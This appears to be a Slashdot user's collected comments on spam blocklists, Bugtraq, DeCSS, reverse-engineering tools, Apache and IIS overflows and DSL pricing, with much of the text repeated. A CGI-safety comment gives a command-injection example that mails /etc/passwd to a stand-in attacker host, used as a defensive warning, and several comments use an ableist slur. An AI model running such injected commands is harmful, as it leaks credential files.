I agree, SORBS are completely retarded. More specifically, the SORBS-DUHL list - it may say it shouldn't be used as a SPAM blocking list but people still use it for that. My work has a static IP address (business DSL) and we got on the dynamic IP address list - trying to get off is impossible, even after getting our ISP to change the TTL for the DNS records, and various other steps.
Our personal impression at work is that SORBS is run by retards who like to feel important by getting major ISPs to work with them. I strongly recommend not using any of their lists, and use more effective SPAM filtering techniques. I could go on and on but if anyone doubts this just do a search for SORBS problems.
There are apps that only run on Macs that us x86 users want (like Emagic's Logic Audio, which used to exist for PC but now is only on Mac). The only problem is apps like this need to run as fast as possible, so this probably wouldn't really be helpful.
d/l this and been playing with it, it seems pretty cool so far. The one thing I can say though is that the sample app it comes with (SimpleApp.java) has some of the worst formatting I've ever seen - you'd think IBM would clean it up a bit before selling it to people as a reference app...
That being said, this will be great if you want to make a open source java app and don't want to require end users to have a particular DB installed (and don't want them to have to create tables , etc).
>This is why they are the top resource for >security people online, and why amateur offerings >like BugTraq don't get the same recognition from
>serious organisations
Top resource for security people online? WTF are you talking about? If security people only followed CERT they'd be rooted in the first 2 months it takes CERT to post an advisory. Bugtraq is the top resource, or one of them, for security people who are competent enough to figure out wether or not an exploit or possible bug applies to them.
If your box is already cracked, then it won't help. But it will help people keep their daemons up to date. If every linux distro automatically checked for updates, even if only for daemons and setuid programs, think of how many less old copies of Bind there would be out there.
If you run debian, you can just run apt-get upgrade and get the newest packages whenever youd like. If one was so inclined a cron job could run it every nite,or once a week, and as long as debian keeps up with the newest vuln. you'll be ok.
The main reason this code (DeCCS) is important is it helps for writing DVD software for linux. And to the person who said blame the people who wrote the standards for allowing it to be cracked, as long as there are software players for any standard it will be crackable, without a doubt. For more information see http://www.counterpane.com/crypto-gram-9911.html#D VDEncryptionBroken , on why you will never have secure software.
Appendix A is "Portability".Mentions different sizes of int and others on different systems, byte order, etc.
theyd have to redesign a whole new mail system
on
UN Proposes Email Tax
·
· Score: 1
How would one tax using SMTP anyway? it would either have to be a whole new protocol, or add on to SMTP or ESTMP. Plus then theres all the bug sthat would appear, and peoples account being charged for emails they never sent because the script kiddies would find some way to abuse it. PLus if that did happen, people would probably set up "rouge" free smtp and pop servers. Taxing email just wouldnt work out, IMHO.
http://fravia.org (which seems to be down half the time) is all about reverse engineering (cracking). It isnt just a simple how to crack (software crack, not bad "hacker") site, he really is interested in reverse engineering. There are even pages about Linux cracking. If his site is down just search for +HCU or +ORC along with +fravia. When I was into that type of stuff, before I got into linux, I used w32dsm, which there are shareware version s of it, but just as I stopped doing that IDA became really big. IDA seems to be better, but W32dsm worked well. And for a windows debugger, you can't beat SoftICE, by Numega. No other debugger for windows even comes close.
It used to be www.genocide2600.com/~tattooman/, why cant it just go back there? It sure didnt last very long at harvard, did the new file part every get working?
The last bug I remember in apache was the flooding it with lots of headers, which was fixed right away. I dont remember a buffer overflow ever being in apache, there might have been one but that woul d have been a long time ago. Now IIS4.0 has a buffer overflow that www.eEye.com found, which gives remote users system access. So assuming you had a Mindcraft survey type machine (4 cpus, huge bandwidth, lots of RAM), now some script kiddie can use that to crack passwd files, or since NT does threading so well, make a threaded port scanner and scan entire Class A's for the newest exploits. Its hard to beleive with how big M$ is they still have a new buffer overflow in one of their programs every 2 weeks. I mean, how hard is it to use snprintf instead of sprintf. M$ could even afford to hire someone full time just to grep for sprintf in any program that uses the internet. Personally, Id rather just be able to serve 100million hits a day or whatever it was and not have people getting root on my server constantly.
They dont mention long term effects, maybe the mice get cancer and die 1 year later. besides, wouldnt that amount of caffeine if given by weight affect most humans pretty badly?
One of the previous posters said he pays $50 a month for DSL. Now I know the cost varies depending on what speed you choose, but are there any other (hidden) fees? Im assuming you probably have to pay for the equipment, or at least lease one from them, but are there also fees for using the phone line or anything like that? I thought ISDN users had to pay for the line along with their monthly fees...
Well first off I personally would never run any of the R*services, it seems like there is a new root remote exploit for one of them every month.As for SSH, that seems to be what everyone recommends here but wasn't that how rootshell (the script kiddie 31337 site) got hacked, through a bug in SSH? And as for CGI programming, always keep things in mind like what if someone passed ";" in their arguments to the script. ie: you call mail %1 and the arguements are " a@aol.com ; mail -s passwd evil@hax0r.org/etc/passwd". Of course thats also a good reason to use shadowed passwords. Oh yeah and if you do any programming for the server please never use sprintf or related functions. Reading BUGTRAQ would be helpful too - if you dont want to subscribe just goto http://www.geek-girl.com/bugtraq/
Slashdot Mirror
I agree, SORBS are completely retarded. More specifically, the SORBS-DUHL list - it may say it shouldn't be used as a SPAM blocking list but people still use it for that. My work has a static IP address (business DSL) and we got on the dynamic IP address list - trying to get off is impossible, even after getting our ISP to change the TTL for the DNS records, and various other steps.
Our personal impression at work is that SORBS is run by retards who like to feel important by getting major ISPs to work with them. I strongly recommend not using any of their lists, and use more effective SPAM filtering techniques. I could go on and on but if anyone doubts this just do a search for SORBS problems.
There are apps that only run on Macs that us x86 users want (like Emagic's Logic Audio, which used to exist for PC but now is only on Mac). The only problem is apps like this need to run as fast as possible, so this probably wouldn't really be helpful.
d/l this and been playing with it, it seems pretty cool so far. The one thing I can say though is that the sample app it comes with (SimpleApp.java) has some of the worst formatting I've ever seen - you'd think IBM would clean it up a bit before selling it to people as a reference app...
That being said, this will be great if you want to make a open source java app and don't want to require end users to have a particular DB installed (and don't want them to have to create tables , etc).
>This is why they are the top resource for >security people online, and why amateur offerings >like BugTraq don't get the same recognition from
>serious organisations
Top resource for security people online? WTF are you talking about? If security people only followed CERT they'd be rooted in the first 2 months it takes CERT to post an advisory. Bugtraq is the top resource, or one of them, for security people who are competent enough to figure out wether or not an exploit or possible bug applies to them.
If your box is already cracked, then it won't help. But it will help people keep their daemons up to date. If every linux distro automatically checked for updates, even if only for daemons and setuid programs, think of how many less old copies of Bind there would be out there.
If you run debian, you can just run apt-get upgrade and get the newest packages whenever youd like. If one was so inclined a cron job could run it every nite,or once a week, and as long as debian keeps up with the newest vuln. you'll be ok.
The main reason this code (DeCCS) is important is it helps for writing DVD software for linux. And to the person who said blame the people who wrote the standards for allowing it to be cracked, as long as there are software players for any standard it will be crackable, without a doubt. For more information see http://www.counterpane.com/crypto-gram-9911.html#D VDEncryptionBroken , on why you will never have secure software.
Appendix A is "Portability".Mentions different sizes of int and others on different systems, byte order, etc.
How would one tax using SMTP anyway? it would either have to be a whole new protocol, or add on to SMTP or ESTMP. Plus then theres all the bug sthat would appear, and peoples account being charged for emails they never sent because the script kiddies would find some way to abuse it. PLus if that did happen, people would probably set up "rouge" free smtp and pop servers. Taxing email just wouldnt work out, IMHO.
http://fravia.org (which seems to be down half the time)
is all about reverse engineering (cracking). It isnt just a simple how to crack (software crack, not bad "hacker") site, he really is interested in reverse engineering. There are even pages about Linux cracking. If his site is down just search for +HCU or +ORC along with +fravia. When I was into that type of stuff, before I got into linux, I used w32dsm, which there are shareware version s of it, but just as I stopped doing that IDA became really big. IDA seems to be better, but W32dsm worked well. And for a windows debugger, you can't beat SoftICE, by Numega. No other debugger for windows even comes close.
It used to be www.genocide2600.com/~tattooman/, why cant it just go back there?
It sure didnt last very long at harvard, did the new file part every get working?
The last bug I remember in apache was the flooding it with lots of headers, which was fixed right away. I dont remember a buffer overflow ever being in apache, there might have been one but that woul d have been a long time ago. Now IIS4.0 has a buffer overflow that www.eEye.com found, which gives remote users system access. So assuming you had a Mindcraft survey type machine (4 cpus, huge bandwidth, lots of RAM), now some script kiddie can use that to crack passwd files, or since NT does threading so well, make a threaded port scanner and scan entire Class A's for the newest exploits. Its hard to beleive with how big M$ is they still have a new buffer overflow in one of their programs every 2 weeks. I mean, how hard is it to use snprintf instead of sprintf. M$ could even afford to hire someone full time just to grep for sprintf in any program that uses the internet.
Personally, Id rather just be able to serve 100million hits a day or whatever it was and not have people getting root on my server constantly.
They dont mention long term effects, maybe the mice get cancer and die 1 year later. besides, wouldnt that amount of caffeine if given by weight affect most humans pretty badly?
One of the previous posters said he pays $50 a month for DSL. Now I know the cost varies depending on what speed you choose, but are there any other (hidden) fees? Im assuming you probably have to pay for the equipment, or at least lease one from them, but are there also fees for using the phone line or anything like that? I thought ISDN users had to pay for the line along with their monthly fees...
Well first off I personally would never run any of the R*services, it seems like there is a new root remote exploit for one of them every month.As for SSH, that seems to be what everyone recommends here but wasn't that how rootshell (the script kiddie 31337 site) got hacked, through a bug in SSH? And as for CGI programming, always keep things in mind like what if someone passed ";" in their arguments to the script. ie: you call mail %1 and the arguements are " a@aol.com ; mail -s passwd evil@hax0r.org /etc/passwd". Of course thats also a good reason to use shadowed passwords. Oh yeah and if you do any programming for the server please never use sprintf or related functions. Reading BUGTRAQ would be helpful too - if you dont want to subscribe just goto http://www.geek-girl.com/bugtraq/
http://www.unix-vs-nt.org/ is the site that talks about M$ moving to NT, then having to go back to solaris.
By latest 2.0.3 version of apache, are they implying apache 2.0.3? I thought the highest was 1.3.6?